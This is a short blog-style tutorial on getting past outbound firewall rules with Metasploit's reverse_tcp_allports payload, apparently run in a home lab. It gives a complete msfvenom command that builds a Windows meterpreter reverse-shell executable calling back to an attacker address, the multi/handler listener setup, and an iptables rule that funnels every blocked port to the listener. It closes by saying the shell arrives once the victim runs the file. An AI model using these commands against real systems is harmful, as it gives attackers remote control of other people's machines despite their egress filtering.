Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports)

at 1:24 AM Monday, January 29, 2018

Introduction

Network Address Translation generally involves re-writing the source and/or destination addresses of IP packets as they pass through a router or firewall  (from http://en.wikipedia.org/wiki/Network_Address_Translation)

The Linux kernel usually possesses a packet filter framework called netfilter (Project home: netfilter.org). This framework enables a Linux machine with an appropriate number of network cards (interfaces) to become a router capable of NAT. We will use the command utility 'iptables' to create complex rules for modification and filtering of packets. The important rules regarding NAT are - not very surprising - found in the 'nat'-table. This table has three predefined chains: PREROUTINGOUTPUT und POSTROUTING.
ALL-PORTS payload:-
‘reverse_tcp’ only allows connection to one port, but if the victim has blocked outgoing connections except a few ports. Then it makes it difficult for the attacker to set a port for listening. ‘reverse_tcp _allports’ is used to to brute-force all the ports from {1-65535}.
We use iptables to reroute any incoming connection to the listening port.
Let’s begin
We use metasploit to create a meterpreter reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=192.168.1.139 lport=4444 -f exe > reverse_shell.exe


We now setup our listener using metasploit.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports
msf exploit(multi/handler) > set lhost 192.168.1.139
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run


Now we setup the firewall on our windows machine. We open firewall and select outbound connections.


We select ports to define the ports we need to block.


We select tcp to block tcp packets, and select port from 4444-5555.


Now we select ‘Block the connection’ to block all the outgoing traffic packets from these ports.


Now we select the types of connection the firewall applies to.


We now name the firewall rule as “REVERSE_SHELL” and click finish


Now we define iptables to reroute all traffic coming to port 4444-5556 to port 4444. So that when the reverse shell tries to connect to our system on port 5556 it will be rerouted to port 4444.
iptables -A PREROUTING -t nat -p tcp --dport  4444:5556 -j REDIRECT –to-port 4444


As soon as the victim runs the file we get our reverse shell.


Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)